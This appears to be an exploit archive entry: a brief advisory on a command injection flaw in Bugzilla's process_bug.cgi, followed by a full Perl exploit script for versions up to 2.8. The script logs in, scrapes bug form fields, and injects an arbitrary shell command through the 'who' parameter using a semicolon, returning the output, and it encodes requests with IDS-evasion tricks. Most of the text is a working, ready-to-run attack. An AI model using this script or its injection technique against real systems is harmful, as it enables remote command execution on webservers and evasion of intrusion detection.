source: Bugzilla is a web-based bug-tracking system based on Perl and MySQL. It allows people to submit bugs and catalogs them. Bugzilla is prone to a vulnerability which may allow remote users to execute arbitrary commands on the target webserver. When accepting a bug report, the script "process_bug.cgi" calls "./processmail" via a perl system() call argumented by a number of paramaters with values originating from user input via a web-form. There are no checks against these values for shell metacharacters by the script before insertion into the system() call. As a result, it possible for an attacker to supply maliciously crafted input to form fields, which when submitted will cause arbitrary commands to be executed on the shell of the host running vulnerable versions of Bugzilla. Commands will be executed with the privileges of the webserver process. #!/usr/bin/perl # Bugzilla 2.8 remote exploit # by {} - [email protected] # RooT66 - # ShellOracle - # b0f - # # This exploits uses antiIDS tricks ripped from whisker # next 2 functinos stolen from whisker, commented by me sub rstr { # no, this is not a cryptographically-robust number generator my $str,$c; $drift=(rand() * 10) % 10; for($c=0;$c<10+$drift;$c++){ $str .= chr(((rand() * 26) % 26) + 97);} # yes, we only use a-z return $str;} sub antiIDS { ($url) = (@_); $url =~s/([-a-zA-Z0-9.\<\>\\\|\'\`])/sprintf("%%%x",ord($1))/ge; $url =~ s/\ /+/g; $url =~s/\//\/.\//g; return $url; } #end of stolen stuff ($complete_url, $Bugzilla_login, $Bugzilla_password, $command) = (@ARGV); print("Exploit for Bugzilla up to version 2.8\n"); print(" by {} - karin\\n"); print("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"); print("RooT66 -\n"); print("ShellOracle -\n"); print("b0f -\n"); print("\n"); if ($complete_url eq "-h" || $complete_url eq "--help") { print("Usage: $0 url emailaddress password command\n"); exit; } # Get information of user if (!$complete_url) { print("URL: "); $complete_url = <STDIN>; chomp($complete_url); $complete_url =~ s/http:\/\///; } if (!$Bugzilla_login) { print("EMAIL: "); $Bugzilla_login = <STDIN>; chomp($Bugzilla_login); } if (!$Bugzilla_password) { print("PASSWORD: "); $Bugzilla_password = <STDIN>; chomp($Bugzilla_password); } if (!$command) { print("COMMAND: "); $command = <STDIN>; chomp($command); } # Set some variables $host = $complete_url; $host =~ s/\/.*//; $base_dir = $complete_url; $base_dir =~ s/^$host//; $base_dir =~ s/[a-zA-Z.]*$//; # Make own directory system("mkdir $$"); print("Getting information needed to submit our 'bug'\n"); # Get product name system("cd $$; lynx -source \"http://$host/" . antiIDS("$base_dir/enter_bug.cgi") . "?Bugzilla_login=" . antiIDS("$Bugzilla_login") . "&Bugzilla_password=" . antiIDS("$Bugzilla_password") . "\" > enter_bug.cgi"); open(FILE, "< $$/enter_bug.cgi"); while($input = <FILE>) { if ($input =~ /enter_bug.cgi\?product=/) { chomp($input); $product = $input; $product =~ s/.*product=//; $product =~ s/".*//; if ($product =~ /\&component=/) { $component = $product; $product =~ s/&.*//; # strip component $component =~ s/.*component=//; $component =~ s/".*//; } } } print("\tProduct: $product\n"); if ($component) { print("\tComponent: $component\n"); } # Get more information $page = antiIDS("$base_dir/enter_bug.cgi?") . "product=" . antiIDS("$product") . "&Bugzilla_login=" . antiIDS("$Bugzilla_login") . "&Bugzilla_password=" . antiIDS("$Bugzilla_password"); system("cd $$; lynx -dump \"http://$host/$page\" > enter_bug.cgi"); open(FILE, "< $$/enter_bug.cgi"); while($input = <FILE>) { chomp($input); if ($input =~ /Reporter:/) { $reporter = $input; $reporter =~ s/.*Reporter: //; $reporter =~ s/\ .*//; } if ($input =~ /Version:/) { $version = $input; $version =~ s/.*Version: \[//; $version =~ s/\.*\].*//; } if ($input =~ /Component:/) { $component = $input; $component =~ s/.*Component: \[//; $component =~ s/\.*\].*//; } if ($input =~ /Platform:/) { $platform = $input; $platform =~ s/.*Platform: \[//; $platform =~ s/\.*\].*//; } if ($input =~ /OS:/) { $os = $input; $os =~ s/.*OS: \[//; $os =~ s/\.*\].*//; } if ($input =~ /Priority:/) { $priority = $input; $priority =~ s/.*Priority: \[//; $priority =~ s/\].*//; } if ($input =~ /Severity:/) { $severity = $input; $severity =~ s/.*Severity: \[//; $severity =~ s/\.*\].*//; } } print("\tReporter: $reporter\n"); print("\tVersion: $version\n"); print("\tComponent: $component\n"); print("\tPlatform: $platform\n"); print("\tOS: $os\n"); print("\tPriority: $priority\n"); print("\tSeverity: $severity\n"); close(FILE); #liftoff print("Sending evil bug report\n"); $page = antiIDS("$base_dir/process_bug.cgi") . "?bug_status=" . antiIDS("NEW") . "&reporter=" . antiIDS($reporter) . "&product=" . antiIDS("$product") . "&version=" . antiIDS("$version") . "&component=" . antiIDS("$component") . "&rep_platform=" . antiIDS("$platform") . "&op_sys=" . antiIDS($os) . "&priority=" . antiIDS($priority) . "&bug_severity=" . antiIDS($severity) . "&who=". antiIDS("blaat\;echo \\<pre\\>START OUTPUT COMMAND;$command;echo \\<\\/pre\\>END OUTPUT COMMAND;") . "&knob=" . antiIDS("duplicate") . "&dup_id=" . antiIDS("202021234123412341234") . "&Bugzilla_login=" . antiIDS($Bugzilla_login) . "&Bugzilla_password=" . antiIDS($Bugzilla_password) . "&assigned_to=&cc=&bug_file_loc=&short_desc=&comment=&form_name=enter_bug"; system("cd $$; lynx -dump \"$host/$page\" > enter_bug.cgi"); open(FILE, "< $$/enter_bug.cgi"); while($input = <FILE>) { chomp($input); if ($input =~ /END OUTPUT COMMAND/) { $startoutput = 0; } if ($startoutput) { print("$input\n"); } if ($input =~ /START OUTPUT COMMAND/) { $startoutput = 1; } } close(FILE); # Delete shit # system("rm -rf $$");